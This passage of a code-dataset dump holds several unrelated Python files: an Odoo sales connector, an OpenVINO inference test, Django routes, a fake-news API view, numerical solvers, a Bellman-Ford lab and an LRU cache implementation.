create_response = self._PostRecord(self.connector_id, resource, **params)\n if bool(create_response) and not bool(create_response.get('erro')):\n context = dict(self.env.context or {})\n context['no_rewrite'] = True\n self.with_context(context).write(create_response)\n response, data = self.env['sale.order'].GetValuesInTTRx(self.connector_id,uuid=create_response['uuid'])\n order_line = []\n for line in data['order_line']:\n order_line += [(1,line[1],{'uuid': line[2]['uuid']})]\n self.with_context(context).write({'order_line': order_line})\n \n self.AfterCreateInOdoo(**params)\n return True\n\n\n def DeleteInTTRx(self, **params):\n self.ensure_one()\n if self.uuid:\n res = {'erro': 'Delete is not possible after transaction to TTRX2'}\n return res\n\n def action_confirm(self):\n res = super(sale_order, self).action_confirm()\n for record in self:\n record.CreateInTTRx()\n return res\n\n @api.model\n def create(self, values):\n if 'order_line' in values:\n res = super(sale_order, self).create(values)\n return res\n else:\n raise ValidationError('No order line is selected.')\n\n def write(self, values):\n res = super(sale_order, self).write(values)\n if len(self.order_line) == 0:\n raise ValidationError('No order line is selected.')\n else:\n return res\n\n # TTRX2 does not support deleting sales orders, so the process is disabled.\n def action_cancel(self):\n res = super(sale_order, self).action_cancel()\n for reg in self:\n if reg.uuid:\n raise UserError(\"Cancellation not possible after transaction to TTRX2\")\n return res\n\nclass SaleOrderLine(models.Model):\n _inherit = 'sale.order.line'\n \n uuid = fields.Char('UUID from TTR', copy=False, readonly=True)\n","repo_name":"DerikBortoletto/odootest","sub_path":"odoo_addons/customers/TrackTraceRx-TTR2/ttrx2_connector_spt_mrp/models/sale_order.py","file_name":"sale_order.py","file_ext":"py","file_size_in_byte":8831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"9420976461","text":"import sys\nfrom proc_utils import cmd_exec # pylint: disable=import-error\nfrom install_pkg import get_openvino_environment # pylint: disable=import-error\n\n\ndef test_infer(test_id, model, artifacts):\n \"\"\" Test inference with conditionally compiled binaries\n \"\"\"\n install_prefix = artifacts / test_id / \"install_pkg\"\n exe_suffix = \".exe\" if sys.platform == \"win32\" else \"\"\n benchmark_app = install_prefix / \"bin\" / f\"benchmark_app{exe_suffix}\"\n returncode, _ = cmd_exec(\n [str(benchmark_app), \"-d=CPU\", f\"-m={model}\", \"-niter=1\", \"-nireq=1\"],\n env=get_openvino_environment(install_prefix),\n )\n assert returncode == 0, f\"Command exited with non-zero status {returncode}\"\n","repo_name":"zhaohb/myopenvino","sub_path":"tests/conditional_compilation/test_infer.py","file_name":"test_infer.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"1642978654","text":"### 20-Newsgroup data parameters ###\n\n### DATASET GENERATION PARAMETERS\npair = ['alt.atheism', 'soc.religion.christian']\nshorthand = 'ac'\nnf = 1000 # Number of words to use as features\n\nn_train = 1000 # total train points to generate\nn_test = 500 # total test points to generate\nn_trials = 1 # number of seeds to generate for\noverwrite = False # Overwrite existing trials\n\n# Load dataset-specific arguments (for train/test)\ndef parse_ds_args(args):\n\tparsed = {}\n\t#parsed['shorthand'] = 
args[0]\n\tparsed['pair'] = args[0]\n\tparsed['nf'] = int(args[1])\n\tparsed['n_trained'] = int(args[2])\n\treturn parsed\n\n# Load generation parameters (for generate_data)\ndef set_generation_params():\n\tparams = {}\n\tparams['pair'] = pair\n\tparams['shorthand'] = shorthand\n\tparams['n_f'] = nf\n\tparams['n_trained'] = n_train\n\tparams['n_test'] = n_test\n\tparams['seeds'] = [int(x) for x in range(n_trials)]\n\tparams['overwrite'] = overwrite\n\treturn params\n\n### DEFINE SAVE LOCATION AND FILES\ndirec = 'Datasets/Newsgroups/'\nimport string\nfile_template = string.Template(\"$pair-f$nf-train$n_trained-seed$seed\")\n#file_params = {'pair':shorthand, 'nf':nf, 'n_trained':n_train, 'seed':0}\nsave_template = string.Template(\"$shorthand-f$nf-train$n_train\")\n\n\n","repo_name":"akellyca/GraphicalEnsembleClassifier","sub_path":"config_newsgroups.py","file_name":"config_newsgroups.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"39032684764","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('basket/', views.basket, name='basket'),\n path('form/', views.form, name='form'),\n path('order/', views.order, name='order'),\n path('product/', views.product, name='product'),\n path('routers/', views.routers, name='routers'),\n path('about/', views.about, name='about'),\n path('addProductToBascet/', views.addProductToBascet, name='addProductToBascet'),\n path('addCount/', views.addCountOrder, name='addCount'),\n path('minusCount/', views.minusCountOrder, name='minusCount'),\n path('category/', views.category_set, name='category'),\n path('search/', views.Search.as_view(), name='search'),\n path('product-data/', views.DetailPopap.as_view(), name='product-data'),\n path('catalog-data/', views.CatalogAPi.as_view(), name='catalog-data'),\n path('category-data/', views.CategoryAPi.as_view(), name='category-data'),\n path('in-basket/', views.in_basket, name='in-basket'),\n path('count-order/', views.count_order, name='count_order'),\n]\n","repo_name":"erllan/ROUTER","sub_path":"shop_router/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"21112787147","text":"from django.shortcuts import render\nfrom rest_framework.views import APIView\nfrom rest_framework import viewsets, status\nfrom rest_framework.response import Response\nimport IsFake.services as services\n\n\n# Train the model first thing when the server starts running\ncount_vect, tfidf_transformer, clf, articles = services.get_trained_machine()\n\n\nclass IsFake(APIView):\n \"\"\"\n The API endpoint for validating the received article.\n \"\"\"\n\n def get(self, request):\n\n params = request.query_params\n if len(params) != 1:\n return Response(\"Please provide an article_url parameter to parse.\", status=status.HTTP_400_BAD_REQUEST)\n else:\n url = params['article_url']\n article_title, article_content = services.parse_article(url)\n whole_content = article_title + '\\n' + article_content\n prediction, score = services.predict(count_vect, tfidf_transformer, clf, articles, whole_content)\n response = {\n 'article_title': article_title,\n 'article_content': article_content,\n 'prediction': prediction,\n 'confidence': score\n }\n\n return Response(response, 
status=status.HTTP_200_OK)\n","repo_name":"Gullumbroso/FakeNewsDetector","sub_path":"IsFake/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"12717558125","text":"# // https://codeforces.com/problemset/problem/71/A\n\ndef function(word): # abbreviate over-long words\n if len(word) <= 10: # words of at most 10 characters are printed unchanged\n print(word)\n else: # longer words: first letter + count of middle letters + last letter\n print(word[0] + str(len(word) - 2) + word[-1])\n\nn = int(input()) # take the number of words as input\nfor i in range(n): # process one word per line\n word = input()\n function(word)\n","repo_name":"Hammad1007/Code-Forces","sub_path":"800/Way too Long Words/wtl.py","file_name":"wtl.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"}
+{"seq_id":"73053321209","text":"class Topology:\n def __init__(self, n):\n self.matrix = []\n self.n = n\n\n def addlink(self, u, v, w):\n self.matrix.append((u, v, w))\n\n def table(self, dist, src):\n print(\"Vector Table of {}\".format(chr(ord('A')+src)))\n print(\"Dest\\tcost\")\n\n for i in range(self.n):\n print(\"{0}\\t{1}\".format(chr(ord('A')+i), dist[i]))\n\n def bellmanford(self, src):\n dist = [9999] * self.n\n dist[src] = 0\n\n for _ in range(self.n - 1):\n for u, v, w in self.matrix:\n if dist[u] != 9999 and dist[u] + w < dist[v]:\n dist[v] = dist[u] + w\n\n self.table(dist, src)\n\n\ndef main():\n matrix = []\n n = int(input(\"Enter number of Nodes : \"))\n print(\"Enter the Adjacency Matrix :\")\n for i in range(n):\n m = list(map(int, input().strip().split()))\n matrix.append(m)\n topo = Topology(n)\n for i in range(n):\n for j in range(n):\n if matrix[i][j] == 1:\n topo.addlink(i, j, 1)\n\n for a in range(n):\n topo.bellmanford(a)\n\n\nmain()\n","repo_name":"harshit3012/CN_Lab","sub_path":"Lab7 (23-11)/dist_vector.py","file_name":"dist_vector.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
+{"seq_id":"28419418882","text":"from scipy.sparse import diags\nfrom utils import Timer\nimport numpy as np\n\n\ndef init(dx, L, T):\n \"\"\"Create dt, Nx, and Nt from dx, L, and T.\"\"\"\n dt = 0.5 * dx ** 2 # stability condition\n\n Nx = int(round(L / dx, 10)) + 1\n Nt = int(round(T / dt, 10)) + 1\n\n return dx, dt, Nx, Nt\n\n\ndef tridiag(n, a, b, c):\n \"\"\"Create a tridiagonal nxn matrix with signature (a, b, c).\"\"\"\n k = [np.full(n-1, a), np.full(n, b), np.full(n-1, c)]\n return diags(k, [-1, 0, 1])\n\n\ndef heat_solver(dx, L, T, u0):\n \"\"\"Solve the heat equation using the forward Euler scheme.\"\"\"\n dx, dt, Nx, Nt = init(dx, L, T)\n\n u_grid = np.zeros((Nt, Nx))\n t_ray = np.zeros(Nt)\n\n assert u0[0] == u0[-1] == 0\n\n u_grid[0, :] = u0\n\n alpha = dt / (dx**2) # = 0.5\n A = tridiag(Nx-2, alpha, 1-2*alpha, alpha)\n if Nx < 90:\n # for small values of Nx, the dense matrix representation is faster\n A = A.toarray()\n\n for i in range(Nt-1):\n u_grid[i+1, 1:-1] = A.dot(u_grid[i, 1:-1])\n t_ray[i+1] = t_ray[i] + dt\n\n return t_ray, u_grid\n\n\ndef get_anasol(dx, T):\n \"\"\"Get analytical solution to the heat equation.\"\"\"\n def u(x, t):\n return np.exp(-np.pi**2 * t)*np.sin(np.pi * x)\n\n dx, _, Nx, Nt = init(dx, 1, T)\n\n x_ray = 
np.linspace(0, 1, Nx)\n t_ray = np.linspace(0, T, Nt)\n\n return u(*np.meshgrid(x_ray, t_ray))\n\n\ndef main():\n timer = Timer()\n T = np.log(100) / (np.pi**2)\n\n for dx in [1e-1, 1e-2]:\n print(f\"dx={dx}\")\n u0 = np.sin(np.pi*np.linspace(0, 1, int(1 / dx) + 1))\n u0[-1] = 0\n\n timer.restart()\n t_ray, u_num_grid = heat_solver(dx, 1, T, u0)\n print(f\" time: {timer.get_pretty()}\")\n\n u_ana_grid = get_anasol(dx, T)\n\n np.savez(\n f\"data/num_solver/dx={dx}.npz\", t_ray=t_ray,\n u_num_grid=u_num_grid, u_ana_grid=u_ana_grid\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Emilinya/FYS-STK4155","sub_path":"project3/src/num_solver.py","file_name":"num_solver.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"31827960988","text":"import sys\nfrom threading import RLock\nfrom typing import Dict, List, Optional, Tuple\n\n\nclass Node:\n def __init__(self, previous: Optional[\"Node\"]=None, next: Optional[\"Node\"]=None,\n key: bytes=b'', value: Optional[\"Transaction\"]=None, value_size: int=0) -> None:\n \"\"\"\n The only node which can have an empty key or value is the root node. None of the added\n nodes will have empty links, keys or values.\n \"\"\"\n self.previous = previous if previous is not None else self\n self.next = next if next is not None else self\n self.key = key\n self.value = value\n self.value_size = value_size\n\n\n# Derived from functools.lrucache, LRUCache should be considered licensed under Python license.\n# This intentionally does not have a dictionary interface for now.\nclass LRUCache:\n def __init__(self, max_count: Optional[int]=None, max_size: Optional[int]=None) -> None:\n self._cache: Dict[bytes, Node] = {}\n\n assert max_count is not None or max_size is not None, \"need some limit\"\n if max_size is None:\n max_size = MAXIMUM_TXDATA_CACHE_SIZE_MB * (1024 * 1024)\n assert MINIMUM_TXDATA_CACHE_SIZE_MB * (1024 * 1024) <= max_size <= \\\n MAXIMUM_TXDATA_CACHE_SIZE_MB * (1024 * 1024), \\\n f\"maximum size {max_size} not within min/max constraints\"\n self._max_size = max_size\n self._max_count: int = max_count if max_count is not None else sys.maxsize\n self.current_size = 0\n\n self.hits = self.misses = 0\n self._lock = RLock()\n # This will be a node in a bi-directional circular linked list with itself as sole entry.\n self._root = Node()\n\n def set_maximum_size(self, maximum_size: int, resize: bool=True) -> None:\n self._max_size = maximum_size\n if resize:\n with self._lock:\n self._resize()\n\n def get_sizes(self) -> Tuple[int, int]:\n return (self.current_size, self._max_size)\n\n def _add(self, key: bytes, value: Transaction, size: int) -> Node:\n most_recent_node = self._root.previous\n new_node = Node(most_recent_node, self._root, key, value, size)\n most_recent_node.next = self._root.previous = self._cache[key] = new_node\n self.current_size += size\n return new_node\n\n def __len__(self) -> int:\n return len(self._cache)\n\n def __contains__(self, key: bytes) -> bool:\n return key in self._cache\n\n def set(self, key: bytes, value: Optional[Transaction]) -> Tuple[bool, List[Tuple[\n bytes, Transaction]]]:\n added = False\n removals: List[Tuple[bytes, Transaction]] = []\n with self._lock:\n node = self._cache.get(key, None)\n if node is not None:\n # This will either remove the entry if the value is `None` or reorder the entry\n # to be the most recent by removing and re-adding it (meaning it will get flushed\n # from the cache after less recent transactions if space is needed).\n previous_node, next_node, old_value = node.previous, node.next, node.value\n previous_node.next = next_node\n next_node.previous = previous_node\n 
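# the node is now unlinked from the recency ring; release its contribution to the\n # byte budget and drop the stale dict entry before the key is (possibly) re-added\n # as the most recent entry below.\n 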
self.current_size -= node.value_size\n del self._cache[key]\n removals.append((key, old_value))\n\n size = obj_size(value)\n if value is not None and size <= self._max_size:\n added_node = self._add(key, value, size)\n a, b, c, d = len(self._cache)-1, self._max_count, self.current_size, self._max_size\n resize_removals = self._resize()\n assert all(t[0] != added_node.key for t in resize_removals), \\\n f\"removed added node {a} {b} {c} {d}\"\n removals.extend(resize_removals)\n added = True\n\n return added, removals\n\n def get(self, key: bytes) -> Optional[Transaction]:\n with self._lock:\n node = self._cache.get(key)\n if node is not None:\n previous_node, next_node, value = node.previous, node.next, node.value\n previous_node.next = next_node\n next_node.previous = previous_node\n most_recent_node = self._root.previous\n most_recent_node.next = self._root.previous = node\n node.previous = most_recent_node\n node.next = self._root\n self.hits += 1\n return value\n self.misses += 1\n return None\n\n def _resize(self) -> List[Tuple[bytes, Transaction]]:\n removals = []\n # Discount the root node when considering count.\n while len(self._cache) > self._max_count or self.current_size > self._max_size:\n node = self._root.next\n previous_node, next_node, discard_key, discard_value = \\\n node.previous, node.next, node.key, node.value\n previous_node.next = next_node\n next_node.previous = previous_node\n self.current_size -= node.value_size\n del self._cache[discard_key]\n removals.append((discard_key, discard_value))\n return removals\n","repo_name":"electrumsv/electrumsv","sub_path":"electrumsv/util/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":5447,"program_lang":"python","lang":"en","doc_type":"code","stars":137,"dataset":"github-code","pt":"77"}
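The LRUCache record above pairs a dict (O(1) key lookup) with a circular doubly linked list rooted at _root (O(1) recency updates), and enforces both an entry-count and a byte-size budget, handing every evicted (key, value) pair back to the caller. For comparison, below is a minimal sketch of the same least-recently-used policy built on collections.OrderedDict; TinyLRU and its count-only limit are illustrative names for this sketch, not part of the electrumsv API.

# Minimal LRU sketch: count-limited only, with none of the byte budget, locking,
# hit/miss counters, or eviction reporting that the LRUCache above provides.
from collections import OrderedDict
from typing import Any, Optional

class TinyLRU:
    def __init__(self, max_count: int) -> None:
        self._items: "OrderedDict[bytes, Any]" = OrderedDict()
        self._max_count = max_count

    def get(self, key: bytes) -> Optional[Any]:
        if key not in self._items:
            return None
        self._items.move_to_end(key)        # a hit makes the key most recently used
        return self._items[key]

    def set(self, key: bytes, value: Any) -> None:
        if key in self._items:
            self._items.move_to_end(key)    # overwriting also refreshes recency
        self._items[key] = value
        while len(self._items) > self._max_count:
            self._items.popitem(last=False)  # evict from the least recent end

cache = TinyLRU(max_count=2)
cache.set(b"a", 1)
cache.set(b"b", 2)
cache.get(b"a")         # touch b"a", so b"b" becomes the eviction candidate
cache.set(b"c", 3)      # exceeds max_count=2 and evicts b"b"
print(cache.get(b"b"))  # -> None

The hand-rolled linked list in the record buys what OrderedDict alone does not: evictions driven by an arbitrary size measure (the obj_size of each transaction) and set()/_resize() returning the displaced pairs so callers can persist them rather than lose them silently.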